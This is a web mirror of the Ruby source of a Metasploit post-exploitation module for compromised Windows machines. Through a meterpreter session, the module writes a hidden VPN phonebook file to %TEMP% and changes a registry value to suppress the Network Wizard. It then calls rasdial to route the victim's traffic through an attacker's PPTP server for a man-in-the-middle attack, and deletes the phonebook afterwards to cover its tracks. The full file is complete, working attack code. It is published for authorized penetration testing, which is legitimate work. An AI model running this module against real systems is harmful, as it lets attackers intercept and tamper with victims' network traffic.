CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
Path: blob/master/modules/post/windows/manage/pptp_tunnel.rb
Views: 1904
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Post6include Msf::Post::File7include Msf::Post::Windows::Priv8include Msf::Post::Windows::Registry910def initialize(info = {})11super(12update_info(13info,14'Name' => 'Windows Manage Remote Point-to-Point Tunneling Protocol',15'Description' => %q{16This module initiates a PPTP connection to a remote machine (VPN server). Once17the tunnel is created we can use it to force the victim traffic to go through the18server getting a man in the middle attack. Be sure to allow forwarding and19masquerading on the VPN server (mitm).20},21'License' => MSF_LICENSE,22'Author' => 'Borja Merino <bmerinofe[at]gmail.com>',23'References' => [24[ 'URL', 'https://www.youtube.com/watch?v=vdppEZjMPCM&hd=1' ]25],26'Platform' => 'win',27'SessionTypes' => [ 'meterpreter' ]28)29)3031register_options(32[33OptString.new('USERNAME', [true, 'VPN Username.' ]),34OptString.new('PASSWORD', [true, 'VPN Password.' ]),35OptBool.new('MITM', [true, 'Man in the middle.', true]),36OptInt.new('TIMEOUT', [true, 'Timeout for the tunnel creation.', 60]),37OptString.new('PBK_NAME', [true, 'PhoneBook entry name.', 'MSF']),38OptAddress.new('VPNHOST', [true, 'VPN server.'])39]40)41end4243def run44version = get_version_info45disable_network_wizard if version.build_number.between?(Msf::WindowsVersion::Vista_SP0, Msf::WindowsVersion::Win7_SP1)4647pbk = create_pbk(datastore['MITM'], datastore['PBK_NAME'])48to = (datastore['TIMEOUT'] <= 0) ? 60 : datastore['TIMEOUT']49begin50::Timeout.timeout(to) do51run_rasdial(pbk, datastore['USERNAME'], datastore['PASSWORD'], datastore['VPNHOST'], datastore['PBK_NAME'])52end53rescue ::Timeout::Error54print_error("Timeout after #{to} seconds")55end56file_rm(pbk)57print_status('Phonebook deleted')58end5960def disable_network_wizard61if !is_admin?62print_error("You don't have enough privileges to change the registry. Network Wizard will not be disabled")63return64end6566key = 'HKLM\\System\\CurrentControlSet\\Control\\Network'67value = 'NewNetworkWindowOff'68begin69if !registry_getvaldata(key, value)70registry_setvaldata(key, value, 3, 'REG_BINARY')71print_good('Network Wizard disabled')72end73rescue ::Exception => e74print_status("The fo llowing Error was encountered: #{e.class} #{e}")75end76end7778def create_pbk(mim, pbk_name)79pbk_dir = expand_path('%TEMP%')80pbk_file = pbk_dir << '\\' << Rex::Text.rand_text_alpha(rand(6..13)) << '.pbk'8182conf_conn = "[#{pbk_name}]\r\n\r\n"83conf_conn += "MEDIA=rastapi\r\n"84conf_conn += "Port=VPN4-0\r\n"85conf_conn += "DEVICE=vpn\r\n"86conf_conn += "IpPrioritizeRemote=0\r\n" unless mim8788if write_file(pbk_file, conf_conn)89print_good("PhoneBook configuration written to #{pbk_file}")90return pbk_file91end92end9394def run_rasdial(pbk, user, pass, vpn_host, pbk_name)95print_status('Establishing connection ...')96cmd_exec('rasdial', '/disconnect')97output_run = cmd_exec('rasdial', "#{pbk_name} #{user} #{pass} /PHONE:#{vpn_host} /PHONEBOOK:#{pbk}")98output_view = cmd_exec('rasdial', nil)99100if output_view =~ /#{pbk_name}/i101print_good('Connection Successful')102else103print_error("Connection failure: #{output_run}")104end105end106end107108109